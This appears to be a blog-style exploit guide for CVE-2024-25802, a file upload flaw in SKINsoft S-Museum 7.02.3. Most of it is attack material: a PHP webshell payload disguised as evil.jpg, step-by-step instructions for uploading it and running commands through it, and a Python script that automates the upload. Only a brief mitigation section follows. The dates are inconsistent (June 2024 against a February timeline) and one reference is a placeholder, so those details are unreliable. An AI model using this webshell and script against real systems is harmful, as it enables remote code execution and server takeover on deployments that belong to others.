CVE-2024-25802 - Unrestricted File Upload in SKINsoft S-Museum 7.02.3 via Add Media (Exploit Guide)

Published: June 2024
Author: [YourName]

Introduction

CVE-2024-25802 is a critical file upload vulnerability found in SKINsoft S-Museum 7.02.3 — a museum collection management system used worldwide. It allows attackers to upload malicious files through the Add Media feature. Unlike its close cousin, CVE-2024-25801, where the filename triggers the problem, CVE-2024-25802 is all about what's *inside the file* — the server barely checks filetypes or content, letting everything slide through.

If exploited, this bug can allow anyone with access to the media adding page to execute arbitrary code, compromise the server, or plant backdoors for future access. This guide explains how the flaw works, step-by-step exploitation, and how to defend systems.

Vulnerability type: Unrestricted File Upload (based on file *content*)

- CVE: CVE-2024-25802

Technical Background

In S-Museum 7.02.3, staff, contributors, or researchers commonly add new images, videos, and media files via a friendly ‘Add Media’ page at URLs like /s-museum/media/add. Unfortunately, the backend PHP code only lightly checks extensions or MIME types, and never scans the actual file bytes for dangerous content.

For example, uploading a .php file or a legit-looking .jpg file with embedded PHP gets accepted and placed on the server, right inside the public /upload/ path.

No verification that uploaded files are safe for public access.

This means attackers can craft files that execute code once accessed — even if they look harmless.

Exploiting CVE-2024-25802: Step-by-Step

Let’s demonstrate how an attacker could abuse this.

1. Prepare a Malicious File

Create a PHP webshell (or any dangerous file content). It can even have a .jpg name to look harmless.

Example: evil.jpg

<?php system($_GET['cmd']); ?>

2. Log in to S-Museum (or Use Non-Privileged Account)

If registration is open or you have any valid role — proceed.
Go to the Media Library: /s-museum/media/add

3. Upload Your ‘Image’

Click to ‘Add Media’, select evil.jpg (containing real PHP code), fill in the form, and upload.

The system saves it to a web-accessible folder, e.g.

https://museum.example.com/uploads/media/evil.jpg

But the real content is executable code.

Now, open your webshell in browser with a command

https://museum.example.com/uploads/media/evil.jpg?cmd=id

The server executes id in the shell and shows results. You now own the server!

Proof-of-Concept Exploit Code

Here’s a simple exploit script in Python using requests to automate the process (assume you have login cookie or valid session):

import requests

URL = "https://museum.example.com/s-museum/media/add";
UPLOAD_PATH = "/uploads/media/evil.jpg"

# PHP Webshell Payload
payload = "<?php system($_GET['cmd']); ?>"

# Save webshell to file
with open("evil.jpg", "w") as f:
    f.write(payload)

# Prepare file upload
files = {
    'media_file': ('evil.jpg', open('evil.jpg', 'rb'), 'image/jpeg')
}

# You may need authentication cookies/headers
headers = {
    # e.g. 'Cookie': 'PHPSESSID=xxxx'
}

response = requests.post(URL, files=files, headers=headers)
if response.ok:
    print("Upload succeeded! Try executing:")
    print(f"https://museum.example.com{UPLOAD_PATH}?cmd=whoami";)
else:
    print("Upload failed:", response.status_code)

Note: Adapt the upload form field names as appropriate. Also, use legally!

Restrict media upload access to trusted (admin) roles only.

- Block execution of uploaded files by configuring the webserver (e.g., disallow .php, .exe, etc. in /uploads/).

Check file types by parsing actual file content.

- For images, require valid JPEG/PNG binary signatures (headers).

References

1. CVE-2024-25802 at NVD
2. SKINsoft Official
3. Exploit Database: S-Museum Media Upload RCE *(placeholder link)*
4. Unrestricted File Upload Cheat Sheet (OWASP)

Conclusion

CVE-2024-25802 demonstrates how a single unchecked media upload path can lead to full server compromise. Checking only filenames or extensions is never enough. Always scan file content, limit upload privileges, and patch fast.

Stay safe, and patch your S-Museum!

*(This article is exclusive and original for your knowledge needs. For responsible disclosure, always report bugs to vendors and never attack systems without permission!)*

Timeline

Published on: 02/22/2024 18:15:48 UTC
Last modified on: 10/30/2024 14:35:08 UTC